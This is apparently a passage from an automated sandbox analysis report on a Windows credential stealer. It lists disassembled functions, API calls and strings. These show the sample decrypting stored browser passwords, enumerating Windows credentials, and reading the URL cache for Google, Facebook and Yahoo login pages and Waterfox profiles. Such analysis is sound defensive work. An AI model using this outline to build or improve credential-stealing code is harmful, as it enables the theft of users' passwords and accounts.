                                            • wcsrchr.MSVCRT ref: 0040B738
                                            • memset.MSVCRT ref: 0040B756
                                            • memset.MSVCRT ref: 0040B7F5
                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                            • memset.MSVCRT ref: 0040B851
                                            • memset.MSVCRT ref: 0040B8CA
                                            • memcmp.MSVCRT ref: 0040B9BF
                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                            • memset.MSVCRT ref: 0040BB53
                                            • memcpy.MSVCRT ref: 0040BB66
                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                            • String ID: chp$v10
                                            • API String ID: 580435826-2783969131
                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                            • String ID:
                                            • API String ID: 3715365532-3916222277
                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                              • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                            • String ID: bhv
                                            • API String ID: 327780389-2689659898
                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                            • API String ID: 2941347001-70141382
                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 650 44674d-44674f 646->650 647->642 649 446734-44673b 647->649 649->642 654 44673d-446745 649->654 651 446755-446758 650->651 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 669 446853-446864 GetStartupInfoW 662->669 670 44684d-446851 662->670 663->661 664->660 664->665 665->662 667 446840-446842 665->667 667->662 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                            • String ID:
                                            • API String ID: 2827331108-0
                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0040C298
                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                            • wcschr.MSVCRT ref: 0040C324
                                            • wcschr.MSVCRT ref: 0040C344
                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                            • GetLastError.KERNEL32 ref: 0040C373
                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                            • String ID: visited:
                                            • API String ID: 1157525455-1702587658
                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                            APIs
                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                            • memset.MSVCRT ref: 0040E1BD
                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                            • _snwprintf.MSVCRT ref: 0040E257
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                            • API String ID: 3883404497-2982631422
                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                            • memset.MSVCRT ref: 0040BC75
                                            • memset.MSVCRT ref: 0040BC8C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                            • memcmp.MSVCRT ref: 0040BCD6
                                            • memcpy.MSVCRT ref: 0040BD2B
                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                            • String ID:
                                            • API String ID: 509814883-3916222277
                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                            APIs
                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                            • GetLastError.KERNEL32 ref: 0041847E
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: CreateFile$??3@ErrorLast
                                            • String ID: |A
                                            • API String ID: 1407640353-1717621600
                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                            • String ID: r!A
                                            • API String ID: 2791114272-628097481
                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                            • _wcslwr.MSVCRT ref: 0040C817
                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                            • wcslen.MSVCRT ref: 0040C82C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                            • API String ID: 62308376-4196376884
                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                            APIs
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                            • wcslen.MSVCRT ref: 0040BE06
                                            • _wcsncoll.MSVCRT ref: 0040BE38
                                            • memset.MSVCRT ref: 0040BE91
                                            • memcpy.MSVCRT ref: 0040BEB2
                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                            • wcschr.MSVCRT ref: 0040BF24
                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                            • String ID:
                                            • API String ID: 3191383707-0
                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                            APIs
                                            • memset.MSVCRT ref: 00403CBF
                                            • memset.MSVCRT ref: 00403CD4
                                            • memset.MSVCRT ref: 00403CE9
                                            • memset.MSVCRT ref: 00403CFE
                                            • memset.MSVCRT ref: 00403D13
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 00403DDA
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                            • String ID: Waterfox$Waterfox\Profiles
                                            • API String ID: 3527940856-11920434
                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                            APIs
                                            • memset.MSVCRT ref: 00403E50
                                            • memset.MSVCRT ref: 00403E65
                                            • memset.MSVCRT ref: 00403E7A
                                            • memset.MSVCRT ref: 00403E8F
                                            • memset.MSVCRT ref: 00403EA4
                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
